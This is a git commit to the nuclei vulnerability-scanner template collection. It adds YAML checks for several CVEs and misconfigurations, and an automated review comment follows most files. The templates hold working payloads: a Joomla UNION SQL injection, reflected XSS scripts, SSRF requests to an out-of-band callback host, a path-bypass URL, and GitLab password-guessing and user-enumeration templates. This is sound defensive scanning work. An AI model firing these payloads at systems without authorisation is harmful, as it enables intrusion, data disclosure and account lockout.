Noam Rathaus 2021-06-20 13:56:54 +03:00
commit bb6fa66dd9
20 changed files with 548 additions and 10 deletions


@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 344 | vulnerabilities | 183 | exposed-panels | 150 |
| takeovers | 67 | exposures | 107 | technologies | 103 |
| misconfiguration | 68 | workflows | 32 | miscellaneous | 24 |
| default-logins | 30 | file | 42 | dns | 10 |
| cves | 349 | vulnerabilities | 184 | exposed-panels | 150 |
| takeovers | 67 | exposures | 107 | technologies | 105 |
| misconfiguration | 70 | workflows | 32 | miscellaneous | 24 |
| default-logins | 31 | file | 42 | dns | 10 |
| fuzzing | 10 | helpers | 9 | iot | 13 |
**118 directories, 1298 files**.
**119 directories, 1311 files**.
</td>
</tr>


@ -0,0 +1,24 @@
id: CVE-2017-15944
info:
name: PreAuth RCE on Palo Alto GlobalProtect
author: emadshanab
reference: http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
severity: high
tags: cve,cve2017,rce,vpn,paloalto
requests:
- method: GET
path:
- "{{BaseURL}}/global-protect/portal/css/login.css"
matchers-condition: and
matchers:
- type: word
words:
- "Last-Modified: Sun, 10 Sep 2017 16:48:23 GMT"
part: header
- type: status
status:
- 200
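Review bot: The only evidence this template collects is a `Last-Modified` header on a static stylesheet, which fingerprints one build of the GlobalProtect portal rather than testing the pre-auth RCE; hosts that patched but kept the asset will still match, and hosts whose file mtime changed on redeploy will not. The `info` block also has no `description:`, unlike the other CVE templates in this commit, so that limitation is invisible to the user. I would add `description: Fingerprints the GlobalProtect portal build associated with CVE-2017-15944 via the Last-Modified date of login.css; this is a version check, not a vulnerability test, and may flag patched hosts.` Whether `part: header` matching is case-sensitive on the raw response (a server emitting `last-modified` would then be missed) is worth confirming against the nuclei docs.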


@ -0,0 +1,22 @@
id: CVE-2018-17254
info:
name: Joomla JCK Editor SQL Injection
author: Suman_Kar
description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
severity: high
tags: joomla,sqli,cve,cve2018
requests:
- raw:
- |
GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Referer: {{BaseURL}}
matchers:
- type: word
part: body
words:
- "nuclei-template"
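Review bot: The injected query pulls `USER()`, `DATABASE()` and `VERSION()` into the response even though the matcher only looks for the `nuclei-template` marker (the hex literal in the same `CONCAT_WS`), so every confirmed hit returns server metadata the scan does not need; reducing the `CONCAT_WS` to the marker alone keeps the same detection with less impact on the target. The `info` block is also missing a `reference:` while the other CVE templates in this commit carry one. The single word matcher without a status check is acceptable here because the marker string is specific, but that reasoning deserves a short comment next to `matchers:`.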


@ -11,9 +11,10 @@ requests:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin.php"
body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN\"><html xmlns=\"hacked'
body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN"><script>alert(0);</script>'
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code==302 && contains(set_cookie, "_icl_current_admin_language")'
- 'contains(tolower(all_headers), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\"><script>alert(0);</script>")'
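Review bot: The reflected marker on the new `body:` line and in the `dsl` condition is the static string `alert(0)`, whereas the sibling template CVE-2020-25495 added in this commit uses `{{randstr}}`; a static marker can be satisfied by a cached or previously modified page, and a per-run value is more accurate. If the DSL matcher expands template variables the way the word matchers do, `{{randstr}}` could be used in both the `body:` line and the `contains(body, ...)` expression — worth confirming before changing it. The enclosing `requests` entry begins before this hunk.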


@ -0,0 +1,30 @@
id: CVE-2020-25495
info:
name: SCO Openserver 5.0.7 - 'section' Reflected XSS
author: 0x_Akoko
description: A reflected Cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'.
severity: medium
tags: cve,cve2020,sco,xss
reference: https://www.exploit-db.com/exploits/49300
requests:
- method: GET
path:
- '{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<h1>hello</h1><script>alert(/{{randstr}}/)</script>"
part: body
- type: word
words:
- "text/html"
part: header


@ -5,7 +5,7 @@ info:
author: luci
severity: critical
description: A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials or trigger Remote Code Execution using CVE-2021-21983.
tags: cve,cve2021,ssrf,vmware
tags: cve,cve2021,ssrf,vmware,vrealize
reference: https://www.vmware.com/security/advisories/VMSA-2021-0004.html
requests:


@ -0,0 +1,30 @@
id: CVE-2021-22214
info:
author: Suman_Kar
name: Unauthenticated Gitlab SSRF - CI Lint API
severity: medium
description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2021-22214
- https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
- https://docs.gitlab.com/ee/api/lint.html
tags: cve,cve2021,gitlab,ssrf,oob
requests:
- raw:
- |
POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Referer: {{BaseURL}}
content-type: application/json
Connection: close
{"content": "include:\n remote: http://{{interactsh-url}}/api/v1/targets?test.yml"}
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
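Review bot: `reference: |` makes the three links one literal string whose lines happen to begin with `- `, not a YAML sequence, so tooling that reads `info.reference` as a list of URLs gets a single multi-line blob; the same construct appears in `detect-sentry` in this commit. Writing it as a plain sequence (`reference:` followed by `- https://...` items) keeps the same content in the expected shape. The matcher confirms only a DNS lookup of the interactsh host, which is adequate for a blind check but worth stating in `description:` so readers do not expect an HTTP callback to be verified.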


@ -0,0 +1,30 @@
id: CVE-2021-28854
info:
name: VICIdial - Multiple sensitive Information disclosure
author: pdteam
severity: high
description: VICIdial's Web Client contains many sensitive files that can be access from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems. This vulnerability affects all versions as of 20/5/21
reference: https://github.com/JHHAX/VICIdial
tags: cve,cve2021
requests:
- method: GET
path:
- "{{BaseURL}}/agc/vicidial_mysqli_errors.txt"
matchers-condition: and
matchers:
- type: word
words:
- 'text/plain'
part: header
- type: status
status:
- 200
- type: word
words:
- 'vdc_db_query'
part: body
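Review bot: The `description` and the `name` ("Multiple sensitive Information disclosure") speak of many sensitive files, but the template probes only `/agc/vicidial_mysqli_errors.txt`; either state which file is checked or narrow the name so users know what a match does and does not prove. The date `20/5/21` in the description is ambiguous between day-first and month-first ordering and is better written as an ISO date. A `reference` to the NVD entry for the CVE would also be more stable than a personal GitHub repository.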


@ -0,0 +1,55 @@
id: gitlab-weak-login
info:
name: Gitlab Weak Login
author: Suman_Kar
severity: high
tags: gitlab,default-login
# Gitlab blocks for 10 minutes after 5 "Invalid" attempts for valid user.
# So make sure, not to attempt more than 4 password for same valid user.
requests:
- payloads:
gitlab_password:
- 12345
- 123456789
gitlab_user:
- 1234
- admin
# Enumerate valid user.
attack: clusterbomb
raw:
- |
POST /oauth/token HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Referer: {{BaseURL}}
content-type: application/json
Connection: close
{"grant_type":"password","username":"§gitlab_user§","password":"§gitlab_password§"}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- application/json
- type: word
part: body
words:
- '"access_token":'
- '"token_type":'
- '"refresh_token":'
condition: and
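Review bot: The payload values `12345`, `123456789` and `1234` are unquoted and parse as YAML integers rather than strings; nuclei presumably stringifies them on substitution, but quoting them (`- "12345"`) removes the dependency on that and matches how the other scalar payloads in this file are written. The header comment says to stay under five attempts per user, and the 2×2 `clusterbomb` honours that (two passwords per user), but nothing records the resulting count, so a later edit to either list could silently cross the lockout threshold. I would add `# 2 users x 2 passwords = 2 attempts per user, below the 5-attempt lockout.` above `attack: clusterbomb`.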


@ -15,3 +15,9 @@ requests:
words:
- "<title>Grafana</title>"
part: body
extractors:
- type: regex
part: body
group: 1
regex:
- 'Grafana ([v0-9.]+)'
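Review bot: The extractor regex `Grafana ([v0-9.]+)` accepts any run of `v`, digits and dots, so it captures trailing punctuation (`7.5.7.` from "Grafana v7.5.7.") and degenerate strings like `v..`; `'Grafana (v?[0-9]+(?:\.[0-9]+)*)'` pins the capture to a version shape. The enclosing `requests` entry begins before this hunk.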


@ -0,0 +1,24 @@
id: extract-urls
info:
name: Extract URLs from HTML attributes
author: dwisiswant0
severity: info
tags: headless,extractor
headless:
- steps:
- args:
url: "{{BaseURL}}"
action: navigate
- action: waitload
- action: script
name: extract
args:
code: |
'\n' + [...new Set(Array.from(document.querySelectorAll('[src], [href], [url], [action]')).map(i => i.src || i.href || i.url || i.action))].join('\r\n') + '\n'
extractors:
- type: kval
part: extract
kval:
- extract
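Review bot: In the headless `code:` script, `i.url` is not a DOM property on any element, so nodes selected by `[url]` contribute `undefined` (which `join` renders as an empty line) instead of the attribute value; `i.getAttribute('url')` would return it. `i.href` on an SVG `<a>` element is an `SVGAnimatedString` rather than a string and would presumably serialise as `[object SVGAnimatedString]`, so guarding with `i.href.baseVal` or `i.getAttribute('href')` for that case is safer too. The single-line expression would also read better as a `|` block with one statement per line.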


@ -30,3 +30,4 @@ requests:
words:
- '"success":true'
- 'rep:password'
condition: and


@ -28,4 +28,5 @@ requests:
- type: word
words:
- '"success":true'
- 'jcr:uuid'
- 'jcr:uuid'
condition: and


@ -0,0 +1,35 @@
id: ssrf-via-oauth-misconfig
info:
name: SSRF due to misconfiguration in OAuth
author: KabirSuda
severity: medium
description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters.
tags: misconfig,oob,oauth
reference: https://portswigger.net/research/hidden-oauth-attack-vectors
requests:
- raw:
- |
POST /connect/register HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept-Language: en-US,en;q=0.9
Connection: close
{
"application_type": "web",
"redirect_uris": ["https://{{interactsh-url}}/callback"],
"client_name": "{{Hostname}}",
"logo_uri": "https://{{interactsh-url}}/favicon.ico",
"subject_type": "pairwise",
"token_endpoint_auth_method": "client_secret_basic",
"request_uris": ["https://{{interactsh-url}}"]
}
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
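Review bot: A successful run leaves a dynamically registered OAuth client on the target (the request is a `/connect/register` POST with `client_name` set to `{{Hostname}}`), which neither `name` nor `description:` mentions; a scanner user should be told the template has a persistent side effect. I would extend the description with `Note: a vulnerable server will register a new OAuth client with these values; remove it after testing.` The matcher accepts any DNS interaction, which also fires if the server merely resolves `logo_uri`/`redirect_uris` during validation without fetching them; if an actual fetch is the intent, matching on `http`, or stating in the description that name resolution is the signal, would be more precise.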


@ -0,0 +1,31 @@
id: zhiyuan-oa-unauthorized
info:
name: Zhiyuan Oa Unauthorized
author: pikpikcu
severity: low
reference: https://buaq.net/go-53721.html
tags: seeyon,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile"
matchers-condition: and
matchers:
- type: word
words:
- "serverIdentifier"
- "companyName"
condition: and
- type: word
words:
- "application/json"
part: header
- type: status
status:
- 200
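Review bot: The `info` block has no `description:` and `reference` is a single aggregator link, so a reader cannot tell what the `..;/` segment in the path is relying on (it looks like a path-normalisation bypass that reaches `ajax.do` without authentication, but the template does not say so). `name: Zhiyuan Oa Unauthorized` should also read `OA`. A one-line description such as `Unauthenticated access to Seeyon/Zhiyuan OA ajax.do via a path-normalisation bypass; the response discloses server and company identifiers.` would be grounded in the matchers.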


@ -0,0 +1,145 @@
id: openssh-username-enumeration
info:
name: OpenSSH 2.3 < 7.7 Detection
author: r3dg33k
severity: medium
tags: network,openssh
description: OpenSSH 2.3 < 7.7 is vulnerable to username enumeration
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
network:
- host:
- "{{Hostname}}"
- "{{Hostname}}:22"
matchers:
- type: word
words:
- "SSH-2.0-OpenSSH_7.6"
- "SSH-2.0-OpenSSH_7.6p1"
- "SSH-2.0-OpenSSH_7.5"
- "SSH-2.0-OpenSSH_7.5p1"
- "SSH-2.0-OpenSSH_7.4"
- "SSH-2.0-OpenSSH_7.4p1"
- "SSH-2.0-OpenSSH_7.3"
- "SSH-2.0-OpenSSH_7.3p1"
- "SSH-2.0-OpenSSH_7.2p2"
- "SSH-2.0-OpenSSH_7.2"
- "SSH-2.0-OpenSSH_7.2p1"
- "SSH-2.0-OpenSSH_7.1p2"
- "SSH-2.0-OpenSSH_7.1"
- "SSH-2.0-OpenSSH_7.1p1"
- "SSH-2.0-OpenSSH_7.0"
- "SSH-2.0-OpenSSH_7.0p1"
- "SSH-2.0-OpenSSH_6.9"
- "SSH-2.0-OpenSSH_6.9p1"
- "SSH-2.0-OpenSSH_6.8"
- "SSH-2.0-OpenSSH_6.8p1"
- "SSH-2.0-OpenSSH_6.7"
- "SSH-2.0-OpenSSH_6.7p1"
- "SSH-2.0-OpenSSH_6.6"
- "SSH-2.0-OpenSSH_6.6p1"
- "SSH-2.0-OpenSSH_6.5"
- "SSH-2.0-OpenSSH_6.5p1"
- "SSH-2.0-OpenSSH_6.4"
- "SSH-2.0-OpenSSH_6.4p1"
- "SSH-2.0-OpenSSH_6.3"
- "SSH-2.0-OpenSSH_6.3p1"
- "SSH-2.0-OpenSSH_6.2p2"
- "SSH-2.0-OpenSSH_6.2"
- "SSH-2.0-OpenSSH_6.2p1"
- "SSH-2.0-OpenSSH_6.1"
- "SSH-2.0-OpenSSH_6.1p1"
- "SSH-2.0-OpenSSH_6.0"
- "SSH-2.0-OpenSSH_6.0p1"
- "SSH-2.0-OpenSSH_5.9"
- "SSH-2.0-OpenSSH_5.9p1"
- "SSH-2.0-OpenSSH_5.8p2"
- "SSH-2.0-OpenSSH_5.8"
- "SSH-2.0-OpenSSH_5.8p1"
- "SSH-2.0-OpenSSH_5.7"
- "SSH-2.0-OpenSSH_5.7p1"
- "SSH-2.0-OpenSSH_5.6"
- "SSH-2.0-OpenSSH_5.6p1"
- "SSH-2.0-OpenSSH_5.5"
- "SSH-2.0-OpenSSH_5.5p1"
- "SSH-2.0-OpenSSH_5.4"
- "SSH-2.0-OpenSSH_5.4p1"
- "SSH-2.0-OpenSSH_5.3"
- "SSH-2.0-OpenSSH_5.3p1"
- "SSH-2.0-OpenSSH_5.2"
- "SSH-2.0-OpenSSH_5.2p1"
- "SSH-2.0-OpenSSH_5.1"
- "SSH-2.0-OpenSSH_5.1p1"
- "SSH-2.0-OpenSSH_5.0"
- "SSH-2.0-OpenSSH_5.0p1"
- "SSH-2.0-OpenSSH_4.9"
- "SSH-2.0-OpenSSH_4.9p1"
- "SSH-2.0-OpenSSH_4.8"
- "SSH-2.0-OpenSSH_4.8p1"
- "SSH-2.0-OpenSSH_4.6"
- "SSH-2.0-OpenSSH_4.6p1"
- "SSH-2.0-OpenSSH_4.7"
- "SSH-2.0-OpenSSH_4.7p1"
- "SSH-2.0-OpenSSH_4.5"
- "SSH-2.0-OpenSSH_4.5p1"
- "SSH-2.0-OpenSSH_4.4"
- "SSH-2.0-OpenSSH_4.4p1"
- "SSH-2.0-OpenSSH_4.3p2"
- "SSH-2.0-OpenSSH_4.3"
- "SSH-2.0-OpenSSH_4.3p1"
- "SSH-2.0-OpenSSH_4.2"
- "SSH-2.0-OpenSSH_4.2p1"
- "SSH-2.0-OpenSSH_4.1"
- "SSH-2.0-OpenSSH_4.1p1"
- "SSH-2.0-OpenSSH_4.0"
- "SSH-2.0-OpenSSH_4.0p1"
- "SSH-2.0-OpenSSH_3.9"
- "SSH-2.0-OpenSSH_3.9p1"
- "SSH-2.0-OpenSSH_3.8.1p1"
- "SSH-2.0-OpenSSH_3.8"
- "SSH-2.0-OpenSSH_3.8p1"
- "SSH-2.0-OpenSSH_3.7.1p2"
- "SSH-2.0-OpenSSH_3.7.1"
- "SSH-2.0-OpenSSH_3.7.1p1"
- "SSH-2.0-OpenSSH_3.7"
- "SSH-2.0-OpenSSH_3.7p1"
- "SSH-2.0-OpenSSH_3.6.1p2"
- "SSH-2.0-OpenSSH_3.6.1"
- "SSH-2.0-OpenSSH_3.6.1p1"
- "SSH-2.0-OpenSSH_3.6"
- "SSH-2.0-OpenSSH_3.6p1"
- "SSH-2.0-OpenSSH_3.5"
- "SSH-2.0-OpenSSH_3.5p1"
- "SSH-2.0-OpenSSH_3.4"
- "SSH-2.0-OpenSSH_3.4p1"
- "SSH-2.0-OpenSSH_3.3"
- "SSH-2.0-OpenSSH_3.3p1"
- "SSH-2.0-OpenSSH_3.2.3"
- "SSH-2.0-OpenSSH_3.2.3p1"
- "SSH-2.0-OpenSSH_3.2.2"
- "SSH-2.0-OpenSSH_3.2.2p1"
- "SSH-2.0-OpenSSH_3.1"
- "SSH-2.0-OpenSSH_3.1p1"
- "SSH-2.0-OpenSSH_3.0.2"
- "SSH-2.0-OpenSSH_3.0.2p1"
- "SSH-2.0-OpenSSH_3.0p1"
- "SSH-2.0-OpenSSH_3.0.1"
- "SSH-2.0-OpenSSH_3.0.1p1"
- "SSH-2.0-OpenSSH_3.0"
- "SSH-2.0-OpenSSH_3.0p1"
- "SSH-2.0-OpenSSH_2.9p2"
- "SSH-2.0-OpenSSH_2.9.9"
- "SSH-2.0-OpenSSH_2.9.9p1"
- "SSH-2.0-OpenSSH_2.9"
- "SSH-2.0-OpenSSH_2.9p1"
- "SSH-2.0-OpenSSH_2.5.2p2"
- "SSH-2.0-OpenSSH_2.5.1p2"
- "SSH-2.0-OpenSSH_2.5.1p1"
- "SSH-2.0-OpenSSH_2.3.0p1"
- "SSH-2.0-OpenSSH_2.5.2p2"
- "SSH-2.0-OpenSSH_2.5.1p2"
- "SSH-2.0-OpenSSH_2.5.1p1"
- "SSH-2.0-OpenSSH_2.3.0p1"
- "SSH-2.0-OpenSSH_2.3"
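Review bot: The banner list contains exact duplicates — `SSH-2.0-OpenSSH_2.5.2p2`, `_2.5.1p2`, `_2.5.1p1` and `_2.3.0p1` appear twice in a row near the end, and `_3.0p1` is listed twice as well — and because word matchers are substring matches, most `pN` and point-release variants are already covered by their base entry (`OpenSSH_7.4` matches `OpenSSH_7.4p1`, `OpenSSH_3.0` matches `OpenSSH_3.0.2`), so the list could be cut by more than half without changing results. More importantly the check is banner-version based: distributions that backport the CVE-2018-15473 fix keep the old banner, so `description:` should say this may flag patched hosts, e.g. `description: Banner-based check for OpenSSH 2.3 to 7.6, the range affected by CVE-2018-15473 (username enumeration); vendor-patched builds keep the same banner and will be flagged.` The `tags` should also include `cve,cve2018` so the reference and the tag taxonomy agree.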


@ -0,0 +1,21 @@
id: detect-sentry
info:
name: Detect Sentry Instance
author: Sicksec
severity: info
tags: ssrf,sentry,tech
reference: |
- https://hackerone.com/reports/374737
- https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- "https://[0-9a-f]*@[a-z0-9]+\\.[a-z.]+.?[0-9]+"
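Review bot: The extractor regex `https://[0-9a-f]*@[a-z0-9]+\\.[a-z.]+.?[0-9]+` uses an unescaped `.?` as a wildcard and allows an empty key via `[0-9a-f]*`, so it also matches unrelated `https://…@host` strings and can capture past the DSN; presumably a DSN has the shape key@host/project-id, in which case `'https://[0-9a-f]+@[a-z0-9.-]+\.[a-z]+/[0-9]+'` pins the capture to that shape — confirm against the Sentry docs. `tags: ssrf,sentry,tech` mixes a vulnerability class into a detection-only template; the reference describes SSRF via Sentry, but the template only extracts the DSN and asserts nothing about it.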


@ -0,0 +1,36 @@
id: vmware-vrealize
info:
name: VMware vRealize
author: milo2012
severity: info
description: Version of VMware vRealize Operations Manager
tags: vmware,vrealize
requests:
- method: GET
path:
- "{{BaseURL}}/ui/login.action"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- text/html
part: header
- type: word
words:
- '<title>vRealize Operations Manager</title>'
part: body
extractors:
- type: regex
part: body
group: 1
regex:
- "SessionProvider.js\\?version=([0-9.]+)"


@ -0,0 +1,42 @@
id: gitlab-user-open-api
info:
author: Suman_Kar
name: GitLab - User Information Disclosure Via Open API
severity: medium
tags: gitlab,disclosure,fuzz
reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158
requests:
- payloads:
uid: helpers/wordlists/numbers.txt
attack: sniper
threads: 50
raw:
- |
GET /api/v4/users/{{uid}} HTTP/1.1
Host: {{Hostname}}
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/plain, */*
Referer: {{BaseURL}}
Connection: keep-alive
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "username.*"
- "id.*"
- "name.*"
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
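Review bot: The regex matcher's `id.*` and `name.*` are satisfied by almost any JSON body (`name` is a substring of `username`, and `id` appears in nearly every payload), so `condition: and` adds no precision beyond `username.*`; matching the keys as they occur in the response — `"username":`, `"id":`, `"name":` — with a word matcher would make the three conditions independent. `threads: 50` against a numeric wordlist sends a high-rate burst per host that is likely to trip rate limiting (429 responses are then silently dropped by the `status: 200` matcher) and to be visible in the target's logs; a lower default with a comment explaining the trade-off would be a safer starting point. `Connection: keep-alive` also differs from the `Connection: close` the other raw templates in this commit use.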


@ -10,4 +10,8 @@ workflows:
- template: exposed-panels/gitlab-detect.yaml
subtemplates:
- template: misconfiguration/gitlab/
- template: misconfiguration/gitlab/
- template: vulnerabilities/gitlab/
- template: cves/2020/CVE-2020-2096.yaml
- template: cves/2021/CVE-2021-22214.yaml
- template: default-logins/gitlab/gitlab-weak-login.yaml
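Review bot: Adding `default-logins/gitlab/gitlab-weak-login.yaml` and the `vulnerabilities/gitlab/` directory as subtemplates means a panel match now triggers credential attempts and, presumably, the 50-thread user-enumeration template added in this commit, with the lockout and rate-limit side effects those templates' own comments describe; nothing in the workflow signals that escalation. A comment such as `# gitlab-weak-login performs login attempts (2 per user); read its lockout note before including this workflow in production scans.` above that line would make it explicit. The enclosing `workflows` list begins before this hunk.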